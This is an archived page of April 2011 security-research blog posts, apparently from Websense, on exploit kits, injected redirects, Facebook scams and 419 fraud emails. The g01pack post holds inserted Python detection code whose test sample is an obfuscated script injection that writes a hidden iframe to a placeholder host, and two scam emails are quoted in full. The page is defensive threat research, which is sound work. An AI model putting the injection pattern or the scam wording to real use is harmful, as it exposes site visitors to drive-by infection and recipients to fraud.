April 2011 Posts

SOURCE Boston 2011 Conference RECAP
Posted: 27 Apr 2011 05:46 PM

I returned this past weekend from SOURCE Boston, where I presented the new features and architecture of Fireshark v2.

I have had the opportunity to speak at many conferences before, but this was my first time doing so in my university town of Boston (Northeastern), and my first time speaking at SOURCE. SOURCE has conference locations in Seattle, Barcelona, and Boston, and attempts to bring security experts together to create a very positive mix of business needs and technology expertise. Boston is a bustling city with a number of technology companies and top universities. The location alone is worth the visit.

That aside, I was impressed with some of the presentations I saw. Here are a few worth mentioning, which are available online at http://www.sourceconference.com/boston/speakers_2011.asp:

  • On The Use of Prediction Markets in Information Security - Dan Geer, Alex Hutton, Greg Shannon
  • The Exploit Intelligence Project - Dan Guido, iSEC Partners (great talk!)
  • Incursion - From Internet To SCADA, Critical Systems Compromise Case Studies in Pictures - Val Smith, Attack Research, and Chris, SecureDNA
  • Fuel for pwnage: Exploit kits - Vicente Diaz and Jorge Mieres, Kaspersky Lab
  • Reverse Engineering Flash Files with SWFREtools - Sebastian Porst (Flash analysis tool released!)
  • Reversing Obfuscation - Adam Meyers, SRA International
  • Streamline Incident Types for Efficient Incident Response - Predrag Zivic and Mike Lecky, Canadian Tire (really interesting talk on identify tracking)
  • Network Stream Hacking with Mallory - Raj Umadas, Jeremy Allen, The Intrepidus Group (Mallory is a tool worth checking out!)
  • Adding another level of hell to reverse engineering - Ben Agre, Raytheon (Something as reverse engineers that we'll have to become accustomed to more and more: used junk code!)

and finally...

My presentation: Fireshark v2 - An Analysis Toolkit for Malicious Web Sites - Stephan Chenette, Principal Security Researcher, Websense Labs (to be publicly available on or before May 5)

(Figure 1: Stephan Chenette introducing Fireshark v2, an analysis tool kit for malicious websites)

I want to thank Stacy Thayer, SOURCE founder, the SOURCE advisory board and all attendees.

(Figure 2: SOURCE founder, Stacy Thayer)

Malicious E-Cards on the prowl
Posted: 26 Apr 2011 09:14 PM

Emails disguised as electronic cards have been used as bait over and over again for malicious intent. The fact that they are overused is a clear indicator that this lure indeed works. Websense Security Labs™ and the Websense ThreatSeeker® Network recently came across an e-card themed email. Our customers are protected from this threat by ACE, our Advanced Classification Engine.

Let us first look at the sample email. The URLs used in the emails are either compromised sites or were created barely two weeks ago.

Screen shot 1 : Sample email that the Websense Email Threat Team got hold of recently

Clicking the URL within the email directs you to a site containing obfuscated code similar to that shown in Screen shot 2. This code then creates an iframe containing another URL, which you can see in Screen shot 3.

Screen shot 2 : Obfuscated code of the URL that came with the email

Screen shot 3 : Deobfuscated code of the URL from the email.

The content of the URL specified in the iframe is another obfuscated script. This script, which uses redirection code strikingly similar to the one in our recent blog, in turn drops the exploit code and runs a rogue AV on the victim's machine.

Screen shot 4 : Code snippet of the URL specified in the iframe used in redirection

Having the victim click on the link and then download an executable is usually the norm for this type of attack. In this case, however, victims are exploited, and malware is downloaded and executed, simply by clicking the URL link that came with the email.

Screen shot 5 : Snapshot of the malicious website used in the email

Websense Email Security and Websense Web Security protect against these kinds of blended attacks.

Mary Grace Timcang

Google Image Poisoning Leads to Exploit
Posted: 21 Apr 2011 01:12 AM

Google search results have traditionally been the target of black hat SEO campaigns. Websense® Security Labs™ has identified a new trend in which cyber criminals take advantage of Google Image search rankings to spread malware.

Websense Security Labs Threatseeker® network has detected that Google Image search returns poisoned pictures when searching on celebrity child "Presley Walker". We first found on Monday that all the image search results took users to a notorious exploit kit – Neosploit. Later, it changed to redirecting users to rogue AV sites. As we publish this blog, the search results are still poisoned and are leading to Neosploit again. Websense customers are protected from both types of attack by ACE, our Advanced Classification Engine.

The search results for "Presley Walker" through Google Image:

Let's take a look at the first attack case. When a user clicks the pictures on the top line, the user will be redirected to a Neosploit exploit page.

Below is one of the redirection chains used by this exploit kit:

From the chain, we see that the third URL is the malicious site holding the exploit code. We found that all the exploit sites are hosted on the same IP, 66.235.180.91, and, interestingly, all of them use the same path name, TF19, which looks like a pattern of this campaign. Finally, the kit triggers the vulnerabilities appropriate to the user's operating system and browser. In the chain above, we see it downloaded a PDF file that targeted three Adobe Reader vulnerabilities. This PDF file is heavily obfuscated and has relatively low VirusTotal detection.

The list of URLs hosted on the IP, as shown from our Threatseeker network:

Neosploit is a well-known exploit kit in the black market. The authors reportedly stopped supporting and updating the exploit kit due to financial problems, but variants of Neosploit have been updated frequently. The variants may contain MDAC (CVE-2006-0003), ActiveX (CVE-2008-2463, CVE-2008-1898), and three Adobe Reader (Collab.getIcon, Util.Printf, Collab.collectEmailInfo) vulnerabilities, among others.

The second case is one of the common tricks black hat SEO campaigns always use: luring users to download fake antivirus software called InstallInternetProtectionXXX.exe. From the VirusTotal scan result, only 20% of antivirus engines detected this malware.

The rogue AV page when using Firefox to surf the Web:

Xue Yang

Facebook scam "My Top 10 stalkers" targets users in specific countries
Posted: 19 Apr 2011 07:08 PM

A new spam campaign, similar to campaigns we have seen in the past, is spreading on Facebook. This one, however, has some interesting twists to it.

The core of the campaign involves a Facebook app that claims to know who your "Top 10 stalkers" are. Our customers are protected from this campaign by ACE, our Advanced Classification Engine.

It works by creating an album - “My Top 10 stalkers” - with the description "Check who views your profile @," followed by a bit.ly URL-shortened link. It then automatically uploads a photo to the app and tries to mark all the user's friends in the photo.

The bit.ly link redirects the user to a page that uses JavaScript to determine the geographical location of the computer based on its IP address. Depending on the location, the page then redirects users located in specific targeted countries to the Facebook App in an attempt to further spread the infected link. The campaign is targeted at Facebook users in the United States, Canada, United Kingdom (including a specific target for Great Britain), Saudi Arabia, Norway, Germany, Spain, Slovenia, Ireland, and United Arab Emirates.

At the time of writing, the hackers have switched to using a new app; the first illegitimate app was deleted by the Facebook security team. Both apps use exactly the same mechanism to post spam profile messages on Facebook. Whether or not the JavaScript redirects the browser to the Facebook app based on its location, all users are ultimately redirected to a scam page that tries to lure them into completing several fake surveys. Hackers use this method to try to collect personal information such as the user's home address, e-mail address, or phone number.

If the user tries to navigate away from the page or close the browser, a message appears asking them to stay and complete a "SPAM-free market research survey to gain access to this special content." Special it may sound, but it is definitely not spam-free!

As always, if a page forces you to Like, Share, or install an application in order to view it, DON'T DO IT! Chances are, it's spam.

Install Defensio, our free security app for Facebook, to prevent scams like this from ever appearing in your news feed.

Anonymous

Mass Injections Leading to g01pack Exploit Kit
Posted: 19 Apr 2011 01:07 AM

Our ThreatSeeker® Network is constantly on the lookout to protect our customers from malicious attacks. Recently it has detected a new injection attack which leads to an obscure Web attack kit. The injection has three phases, which will be covered in this blog post. Websense customers are protected from this attack by ACE, our Advanced Classification Engine.

The first phase of the attack is a typical vector exploit kits use to drive traffic to their sites: script injections. Script tags are placed on legitimate Web sites to drive traffic to the attack kits without the victim's knowledge. In this case, legitimate sites are injected with malicious JavaScript.

Screen shot of malicious script injection (Phase 1):

In the second phase, this script injection pulls obfuscated content from another site. The obfuscated content creates an iframe that is used to pull content from the exploit kit site.

Screen shot of the obfuscated redirect site used in the above injection (Phase 2):

Screen shot of the deobfuscated redirection site:

The exploit kit can basically be described as a drive-by download site, used in the third and final phase of this attack. Its intent is to scan, attack, and run malicious code on the visitor's computer. If one of the exploit kit's Web attacks succeeds, it can put malware on the victim's computer that is meant to remotely control it. The binary that this kit tries to run on target computers has low detection as a Rogue AV installation. As is typical, the exploit kit's Web attack code is obfuscated.
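The injected script and the obfuscated iframe redirect described in phases 1 and 2 above (and in the e-card post earlier on this page) can be triaged with a small static scanner. The following Python is an added example, not Websense code: the page markup, the placeholder host redirect.invalid and the percent-encoded payload are constructed here to mirror the pattern, not copied from the real injection.

```python
import re
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
STR_LIT_RE = re.compile(r"""(?:"([^"\n]*)"|'([^'\n]*)')""")
# A long run of %XX / %uXXXX escapes is the hallmark of unescape()-based droppers.
PCT_RUN_RE = re.compile(r"(?:%(?:u[0-9a-fA-F]{4}|[0-9a-fA-F]{2})){16,}")
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode", "document.write(", "\\x")


def obfuscation_score(js: str) -> int:
    """Count obfuscation indicators in one script body (0 = looks ordinary)."""
    score = sum(1 for marker in OBFUSCATION_MARKERS if marker in js)
    if PCT_RUN_RE.search(js):
        score += 1
    return score


def decode_escaped_literals(js: str) -> list:
    """Percent-decode string literals the way JavaScript unescape() would, so we
    can inspect what an obfuscated document.write() really emits."""
    decoded = []
    for m in STR_LIT_RE.finditer(js):
        literal = m.group(1) if m.group(1) is not None else m.group(2)
        if "%" not in literal:
            continue
        # unescape() understands %uXXXX; urllib's unquote() does not, so map those first.
        text = re.sub(r"%u([0-9a-fA-F]{4})", lambda u: chr(int(u.group(1), 16)), literal)
        decoded.append(unquote(text))
    return decoded


def parse_attrs(attr_text: str) -> dict:
    """Tag attributes as a lower-cased name -> value dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def _dim(value):
    """Parse a width/height attribute such as '1' or '1px'; None if absent or odd."""
    if value is None:
        return None
    try:
        return int(value.strip().lower().rstrip("px"))
    except ValueError:
        return None


def find_hidden_iframes(markup: str) -> list:
    """Return src values of iframes that are 1x1 (or smaller) or hidden by style."""
    hits = []
    for m in IFRAME_RE.finditer(markup):
        attrs = parse_attrs(m.group(1))
        w, h = _dim(attrs.get("width")), _dim(attrs.get("height"))
        style = attrs.get("style", "").replace(" ", "").lower()
        tiny = w is not None and h is not None and w <= 1 and h <= 1
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            hits.append(attrs.get("src", ""))
    return hits


def scan_page(html: str) -> dict:
    """Flag obfuscated scripts and hidden iframes, including iframes that only
    appear after decoding a script's escaped string literals."""
    report = {"suspicious_scripts": [], "hidden_iframes": find_hidden_iframes(html)}
    for js in SCRIPT_RE.findall(html):
        score = obfuscation_score(js)
        decoded = decode_escaped_literals(js)
        for text in decoded:
            report["hidden_iframes"].extend(find_hidden_iframes(text))
        if score >= 2:
            report["suspicious_scripts"].append({"score": score, "decoded": decoded})
    return report


def percent_encode(text: str) -> str:
    """Encode every byte as %XX, the form unescape()-based droppers carry."""
    return "".join("%%%02X" % b for b in text.encode("utf-8"))


# Constructed sample (not the real injection): a benign script, then an injected
# document.write(unescape(...)) that emits a 1x1 hidden iframe to a placeholder host.
INJECTED_IFRAME = ('<iframe src="http://redirect.invalid/in.php" width="1" height="1" '
                   'style="visibility:hidden"></iframe>')
SAMPLE_HTML = (
    "<html><head><title>E-card</title>\n"
    "<script>var card = document.getElementById('card'); card.onclick = showCard;</script>\n"
    "</head><body>\n"
    "<script>document.write(unescape('" + percent_encode(INJECTED_IFRAME) + "'));</script>\n"
    "<p>You have received an e-card!</p>\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    print(scan_page(SAMPLE_HTML))
```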

 

Screen shot of obfuscated exploit kit code (Phase 3):

It's in cases like this that we can really harness the power of our ThreatSeeker® Network, not only to better protect our customers but also to perform further research into attacks! With all of the scanning that ThreatSeeker® does, we get a large amount of data which we can correlate. In this example, I can see all of the URLs associated with the IP address that this exploit kit was hosted on.

Screen shot of URL report from hosting IP:

In the screen shot above, I've highlighted that there are a number of URLs with an "/admin/" directory. Assuming that these are the same attack kits hosted on this IP, I can try to see if our attack host has the same page. Sure enough, the attack site discussed in this blog follows the convention of other sites hosted on this IP.

Screen shot of the attack kit admin page:

Notice the title on the admin page: it has an email address for a group known as the Iranian Cyber Army. This is a known attribute of a kit called g01pack malware tool. We were able to access the admin panel and confirm that this site is hosting an installation of g01pack malware tool.

Screen shot for g01pack admin statistics for this attack:

Update:

We are aware that the g01pack admin panel is in fact a fake honeypot tool used by attackers. This admin "tool" is used to track researchers who try to access admin panels for attack kits, an interesting tactic. However, the threat described in this blog is very real, and we are seeing other attack hosts on the same IP attacking visitors. Since the other hosts on this IP also carry the fake admin panel, we treat them as exploit kit attack hosts that could be used in the same script injection attacks as well as other injection attacks. Thanks @briankrebs for getting in touch with us to clarify this post.
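The pivot used in this post (other URLs on the hosting IP sharing an /admin/ directory) and in the Google Image poisoning post above (every exploit site on one IP sharing the path name TF19) can be automated over URL telemetry. The following Python is an added example, not ThreatSeeker code; the records, host names and IP addresses are constructed placeholders.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed telemetry (url, resolved_ip): .example hosts and documentation IPs.
# The TF19 and admin path tokens mirror the pattern described in the posts;
# nothing here is a real indicator.
RECORDS = [
    ("http://host-a.example/TF19/index.php", "203.0.113.10"),
    ("http://host-b.example/TF19/index.php", "203.0.113.10"),
    ("http://host-c.example/TF19/pdf.php", "203.0.113.10"),
    ("http://host-c.example/admin/", "203.0.113.10"),
    ("http://host-a.example/admin/login.php", "203.0.113.10"),
    ("http://blog.example/2011/04/post.html", "198.51.100.7"),
    ("http://shop.example/cart/", "198.51.100.7"),
]


def directory_segments(path: str) -> list:
    """Path components that look like directories; a trailing file name such as
    index.php is dropped because almost every site has one."""
    parts = [p for p in path.split("/") if p]
    if parts and "." in parts[-1]:
        parts = parts[:-1]
    return parts


def pivot_by_ip(records, min_hosts: int = 2) -> dict:
    """Group URLs by hosting IP and rank directory names shared across distinct
    hosts on that IP. An IP whose hosts share an unusual directory name (TF19,
    admin) is a campaign candidate worth a closer look."""
    hosts_by_ip = defaultdict(set)
    seg_hosts = defaultdict(lambda: defaultdict(set))  # ip -> segment -> hosts
    for url, ip in records:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        hosts_by_ip[ip].add(host)
        for seg in directory_segments(parts.path):
            seg_hosts[ip][seg].add(host)
    result = {}
    for ip, hosts in hosts_by_ip.items():
        if len(hosts) < min_hosts:
            continue
        shared = [(seg, sorted(h)) for seg, h in seg_hosts[ip].items() if len(h) >= min_hosts]
        # Most widely shared segment first, then alphabetical for stable output.
        shared.sort(key=lambda item: (-len(item[1]), item[0]))
        if shared:
            result[ip] = {"hosts": sorted(hosts), "shared_segments": shared}
    return result


def unseen_combinations(pivot: dict) -> list:
    """Hosts on a flagged IP not yet seen with one of its shared directory names:
    the (ip, host, segment) triples to look for next in telemetry, which is the
    check the post performs for /admin/ by hand."""
    todo = []
    for ip, info in pivot.items():
        for seg, seen_hosts in info["shared_segments"]:
            for host in info["hosts"]:
                if host not in seen_hosts:
                    todo.append((ip, host, seg))
    return todo


if __name__ == "__main__":
    pivot = pivot_by_ip(RECORDS)
    for ip, info in pivot.items():
        print(ip, info["shared_segments"])
    print(unseen_combinations(pivot))
```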

Chris Astacio

Boxes of Money !
Posted: 15 Apr 2011 02:27 AM

Phishing and 419 scams have been around for a while now. However, sometimes they never cease to amaze when it comes to their tactics. We caught this most recent one in one of our Honeypots and thought we would share due to the “over-the-top” images sent.

Also note the horrific markup of the passport.

-----------------------------------------------------------------------------

Email sent from: usermail.uni-ak.ac.at ([193.170.136.34])

Email Subject: urgent response

Email body:

Apologies for having to reach out to you like this, my name is Gideon Kerkula am from Liberia, I and my mother just arrived with 2 inherited trunk boxes which our late father kept in our under ground flat which we discover and we collected money from it and I took picture with the two trunk boxes, we need your help to clear the money from the custom and help us invest it in any profitable investment that will last for a life time, the US$35,000 we collected from the boxes we use it for clearance on Ivory Coast- Abidjan border and the settlement of the military and police force on the highway. Please I want you to keep it confidential between us.

I have also attached my passport and the picture I took with the 2 trunks boxes, please if there's anything you don't understand or you want to know, ask and we will enlighten you.

I appreciate and wait your response.Please reply to this email;GideonKerkula@removed.cn

Thanks,

Gideon kerkula

-----------------------------------------------------------------------------

Images that were attached:

You would have thought Gideon would have given up at this point - however, there is a follow-up. Brace yourself for the sequel:

-------------------------------------------------------------------------

From: Kelvin Kerkular [mailto:kkelvin1979@removed.cz]
Sent: 07 April 2011 06:44
Subject: PRIVATE AND CONFIDENTIAL

From:
Kelvin and Vivian
Tel:233 26 750 6123

Dear Beloved,

My name is Kelvin Kerkular I am 32 years old, and my junior sister name is Vivian Kerkular, 29 years old, we are Citizens of Liberia, currently residing in the refugee camp in Ghana. I am contacting you solely on a business related issues.

I became an orphan some couple of years ago. I am contacting you about a need I have and I believe you are well able to help me after my severe and fervent prayer for God to link me up with some one who will be capable of helping me out from Ghana as my foreign beneficiary. It all depends on our trusting each other but I've chosen to contact you prayerfully and believing that you are the person that can help me.

The source of my parent's death was believed to be from our detractors who are never happy that he was making so much progress. The issue is that my parents are diamond merchants in my country Liberia and they made too much money from the business, that prompted the government of Liberia to probe them.

For this reasons, during the crisis in Liberia, our home was among the first target by the Liberian rebels. They allegedly said that, my late parents have a close relationship with former president of Liberia President Charles Taylor) that was their reason of storming our home. My mother died immediately they storm our resident and my father sustained serious bruises that he could not survive while in the hospital. I and my younger sister Vivian managed to escape during the incident. As i am talking to you now, i and my younger sister are staying in Ghana for some obvious reasons that i will like to relay to you on your response to this message.

This is a confidential matter i will like to discuss with someone whom my spirits accepted to deal with. Because after my parents exit, the government of Liberia have taken over all of our belongings. They have also emptied my parents bank accounts left alone with a deposit which my late father made in a nearby country called Ghana during his trade to Ghana. No one knows of this deposit, it is only me as the next of kin. And my father had earlier warned me not to disclose this issue to anyone before he died in the hospital after the incident that cause his death. Today I and my younger sister fend for ourselves here in Ghana.

And life has been very difficult since the government of Ghana started their deportation exercise which says that we refugees should evacuate their Bujumbura refugee camp to our various countries. Please my dear beloved, our plans now are to relocate from Ghana since we can not afford to go back to Liberia following our past experience as they killed our parents, but we will need to move out the fund left by my late father here in Ghana.
please according to my late father's lawyer all we need now before these boxes can leave Ghana to  is your full contact information so as to enable the lawyer work out the papers that will back up the shipment to your location. Please i believe my lawyer will explain more better to you as soon as you come in contact with him.

Once you agree to help us move this fund, we will link you up with our late father's lawyer who will help us in securing all the necessary documents for the shipment. As soon as we agree, we will come to your country where I and my sister will invest the money under your guide. So please let us know what will be your compensation or percentage for helping me and my sister out.

In the attached files, you will see a photograph picture which my late father took me before he made the deposit as a proof, and a picture of my sister, Vivian. Please the lawyer have not seen this picture as my father warned me not to disclose the content of the boxes to anyone except to some one whom i have chosen to be my foreign beneficiary, and also attached are the copies of the documents that is covering the fund in the keeping company, so i want you to go through them carefully. sometime ago there was a problem in the camp and my sister lost her Liberia passport but the lawyer agreed to get her a Ghana passport if we are ready to travel out of Ghana to meet with our foreign beneficiary.

Please NOTE that the earlier you help us the better as you will be doing Almighty God a great favor because our lives are no more safe with these people over here. I will need your reply stating your readiness to help in seeing this through.

We will be needing your details as follows:
(1) Your Full Names.
(2) Your Home or Office Address.
(3) Your cell phone Number.
(4) Occupation.
(5) Age.

Please feel free if you have any question to ask.

Thanks and be bless
Kelvin and sister.

-------------------------------------------------------------------------

And yup, you guessed it: more convincing attachments:

And finally, the cream of the crop: a convincing photo of Vivian, Gideon's or (as he prefers in the second email message) Kelvin's sister.

Well, Kelvin Gideon Kerkula if that is your real name... consider this. You have been named and shamed. Unfortunately your overzealous tactics in an attempt to 'social engineer' or to convince me and everyone else do not work.

I wonder what the next in the trilogy will be...

Of course Websense customers are being continually protected against phishing emails such as these with our Advanced Classification Engine, ACE.

John Smith

Attackers taking advantage of Epsilon
Posted: 14 Apr 2011 10:56 PM

We blogged about the Epsilon data breach to give our customers a heads-up on the situation. Recently, our ThreatSeeker® Network discovered a Web attack that takes advantage of the unfortunate news. As with anything our ThreatSeeker Network discovers, Websense customers are protected by ACE, our Advanced Classification Engine.

The attack is hosted on a Web page that has a very professional look and feel, and uses convincing social engineering techniques to lure victims. The attack page is basically a cut-and-paste copy of the HTML code from the original Epsilon press release. This provides the professional appearance of the Epsilon site to lure victims. The big difference is that the attack page provides a malicious binary download.

Screenshot of the Epsilon attack page:

Screenshot of the attack page source code:

The attack page tries to get visitors to download the malicious binary by convincing them that there was an update to the press release dated April 8th. The "update" states that Epsilon's investigation into the data leak has revealed that personally identifiable information was lost in the attack. The fake update goes on to state that people can check to see if their personal information was lost by downloading and installing an "Epsilon Secure Connect Tool." The downloaded file is called EpsilonSecureConnect.exe and has little detection as a Trojan dropper.

Chris Astacio

This Month in the Threat Webscape - March 2011
Posted: 13 Apr 2011 02:12 PM

Month of March

Major hits

March 17 of this year will be remembered very well for a long time - in fact, we should celebrate it as BreachID Day from now on. RSA’s Executive Chairman Art Coviello wrote an open letter giving a short background on the breach, which happened in their “kitchen” as an “extremely sophisticated cyber attack” that put their SecurID product at risk. Even though the breach probably did not disclose any very sensitive data, it pointed out just how fragile security is.

Popular streaming service Spotify got compromised via third-party ads that served malicious content to all free users. Seems like free does come at a price after all.

Comodo, a certificate vendor, informed us that nine bogus SSL certificates had been issued for several top Alexa domains. The certificates were revoked immediately - well, once Comodo found out what had been going on. However, it happened again with two more, and again, and - in fact, who knows what else?

Are you using TripAdvisor when planning your holidays? You really should expect more spam in the future. The company announced a breach in which all members’ data was lost. Fortunately, no credit card details - this time at least.

First the EU, then the French government - it looks like a new “fashion” hype. “We have been hacked!” or “attacked” or “infiltrated” or ... This month revealed more than one cyber attack. Probably, we should just call it the BreachID Month after all this.

Some may think a couple of breaches a month is not that unusual of a thing. Well, there is more. Play.com let “only customer emails” go for a walk not knowing where. Maybe they'll come back in fit form one day, won’t they? Ah, and of course, there is another one: PHP.net found some muddy tracks on one of their servers. You see, the BreachID Month suddenly makes more sense now.

Some may STILL say these are normal issues. We have one more in our back pocket though. LizaMoon mass injection compromised some hundreds of thousands of URLs in a matter of hours. iTunes was one of the big names there. You see, this March was really an unusual month in the end.

Web 2 dot uh oh

Ashton Kutcher's twitter account appeared to be hacked in early March, posting 2 tweets on his behalf. This compromise challenges Twitter's security policies in using SSL.

Facebook recently introduced Report Suicidal Content, a service that would allow Facebook users to report any Facebook friend who has posted suicidal content on their accounts. This is in response to the growing number of suicidal posts in Facebook in the last few months.

A 17-year old was arrested in connection with the Facebook birthday hoax in Sydney. The suspect apparently posted a birthday invite after creating a fake Facebook account of a girl, which then hauled 200,000 positive replies.

Browser and friends

This month, Apple has more stories to tell us. First, Apple released iTunes 10.2, patching a whopping 57 security vulnerabilities, some serious enough to give an attacker complete control if a user simply opens an image file or surfs to a compromised website; 50 of the 57 vulnerabilities were fixed in WebKit. Apple also released a security update for the Pwn2Own vulnerability exploited by the winning hacker at Pwn2Own 2011, which was used to hijack an iPhone 4's address book when the user surfed, via the iPhone 4’s built-in Safari browser, to a rigged website hosting a Microsoft PowerPoint document.

And finally, there is a Java update for Mac OS X users. One of the most serious flaws could allow an untrusted Java applet to execute arbitrary code outside of the Java sandbox.

Adobe has announced a Flash Player update to fix a critical security hole, a new 0-day vulnerability. This vulnerability could cause a system crash or allow attackers to get in via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file, delivered as an email attachment.

The Firefox 4 release included a number of significant security features. Mozilla also provided security updates for some older browsers and added some newly blacklisted SSL certificates from the “Comodo Affair.”

This month, WordPress released version 3.1.1, in which three security issues have been fixed.

Microsoft

Microsoft released three bulletins that patched four security holes in Windows and Microsoft Office on this month's Patch Tuesday. Two vulnerabilities were fixed in the critical bulletin MS11-015, which resolved one publicly disclosed vulnerability, CVE-2011-0032 in DirectShow, and one privately reported vulnerability, CVE-2011-0042 in Windows Media Player and Windows Media Center. The vulnerabilities can only be triggered when a user opens a specially crafted Digital Video Recording (.dvr-ms) file; if the file is not opened, the attack will not succeed.

The second update, MS11-016, patched the Microsoft Groove Insecure Library Loading Vulnerability, CVE-2010-3146, which could allow remote code execution if a user opens a legitimate Groove-related file located in the same network directory as a maliciously crafted library file. Users with administrative rights are more exposed than users with fewer rights on the system.

The third, MS11-017, rated as an “important” bulletin, covers a code execution flaw, CVE-2011-0029, in the Windows Remote Desktop Client. Like the vulnerabilities in the first bulletin, the user has to manually open an RDP file for Remote Desktop for the attack to succeed.

Apart from this batch of updates, some well-known vulnerabilities, such as the XSS vulnerability CVE-2011-0096, remain unpatched; Microsoft provides a workaround in an advisory to help users. For the Malware Protection Engine elevation of privilege vulnerability, CVE-2011-0037, Microsoft suggests that users ensure the Microsoft Malware Protection Engine is kept up to date automatically, which resolves the issue.

Windows Internet Explorer 9 was released to the public on March 14, 2011. To protect the security and privacy of your information, IE9 has introduced Tracking Protection and ActiveX Filtering. Tracking Protection can limit a browser's communication with certain websites to help keep your information private; ActiveX Filtering blocks ActiveX controls for all sites. Other security features are also included such as SmartScreen Filter, Cross site scripting (XSS) filter, and Domain highlighting. IE9 is supported by all new versions of MS Windows but not by Windows XP.

Hello ThreatSeeker® Network. You've got mail!

One of the largest spam generator botnets - Rustock was taken down by the Microsoft digital crime unit and U.S. federal law enforcement agents. Global spam volumes noticeably decreased since March 16.

Following the disaster in Japan on March 11, cybercriminals tried every possible underground technique to profit from the event. Apart from already known vectors such as phishing and malicious spam emails, criminals used viral Facebook applications.

Fake Facebook emails, the Black Hole Exploit Kit, and Zeus are three well-known tools and techniques used by criminals on a daily basis. On March 18, a malicious campaign masquerading as Facebook emails was seen in the wild. The campaign originated from the Cutwail/Pushdo spam bot and carried a link leading to the Black Hole Exploit Kit, which served a Zeus/Zbot Trojan as its payload.

Security trends

RIM has bulked out its consumer offering to locate, back up and remotely wipe users’ BlackBerry handsets. The free BlackBerry Protect service is now in open beta, with no IT department needed behind the user. The application had been in closed beta since December, but can now be downloaded from BlackBerry App World.

Security researcher Luigi Auriemma has released proof of concept code for 34 vulnerabilities affecting popular SCADA systems. The majority of the vulnerabilities allow remote code execution on Internet-connected systems, with the remaining offering access to stored data.

A Dutch court has ruled that hacking into an open wireless network is not a crime in the Netherlands. Dutch law defines a computer as a machine involved in the "storage, processing and transmission of data." Since a router is not used to store data, the judge reasoned that it fails to qualify as a computer – and thus the computer hacking law isn't applicable.

Intel has started working with customers that use embedded computers in all kinds of devices, following its $7.7 billion acquisition of security software maker McAfee. Security can be baked into devices such as printers, automated teller machines, televisions, and cars, and Intel is drawing up a plan to provide more security-assisting features on its future chips.

This month's roundup contributors:

Ivan Sabo
Grace Timcang
Qiong Ran
Xue Yang
Artem Gololobov
Lei Li

Ivan Sabo

One more Adobe 0-day vulnerability using Office files
Posted: 11 Apr 2011 04:44 PM

Today Adobe announced a new 0-day vulnerability (CVE-2011-0611) in Adobe Flash Player and Adobe Acrobat that, similar to the previous 0-day from less than a month ago, was found embedded in a Microsoft Office file. The vulnerability allows an attacker to execute malicious code on a computer and has been spotted in limited targeted attacks. Websense customers are protected against the known samples that use this vulnerability.

Adobe says in its security advisory that Adobe Acrobat Reader X and its new Sandbox feature prevent the attack from exploiting the system when PDF files are used. However, since the vulnerability exists in Flash, a machine can be exploited through other formats and applications that support Flash, such as Web pages and Office documents.

The vulnerability has only been seen used in very limited targeted attacks. Here is a VirusTotal report (1/43) of one reported attack file.

Adobe hasn't announced when they will release a patched version of Adobe Flash and Adobe Reader/Acrobat but they did say that they won't fix this until June 14 in Adobe Reader X, as the Sandbox feature prevents the attack.

Patrik Runald

"The Hottest & Funniest Golf Course Video" scam has more than 200,000 likes on Facebook
Posted: 09 Apr 2011 05:53 PM

Right now there's a scam making its way across Facebook linking to a video titled "The Hottest & Funniest Golf Course Video - LOL" (example screen shot below). Websense customers are protected by ACE, our Advanced Classification Engine. During the 15 minutes it took to write this post, over 7,000 new users liked the page, so it's clear this is a successful campaign.

This latest scam is very much like a lot of others we see on a regular basis on the world's most popular social networking site. But this one seems to be especially popular for some reason.

When clicking on the link you're taken to the following page, tricking you into not only liking the page but also sharing it with your friends. It's doing this by using standard Facebook APIs.

The page that you are tricked into liking has been liked by over 272,000 users and doesn't really have anything to do with the scam itself but is perhaps there to make it look more legitimate. The quote "<name>, are you scared? Of course I'm scared. I'm not Superman" is a quote by the actor Jackie Chan.

After liking and sharing the page, and attempting to view the video, the user is taken to a typical CPA Survey scam, so in the end there's no video at all. Note that the attackers haven't even bothered to change the title of the last payload site. The title still says "Look What Happens When a Father Catches her Daughter on Webcam", which is another scam that went around Facebook months ago.

As always, if a video forces you to like, share, or install an app to view it, DON'T DO IT! And of course, install Defensio, our free security app for Facebook. It will keep scams like this from ever appearing on your news feed in the first place.

Patrik Runald

©2013 Websense, Inc. All Rights Reserved.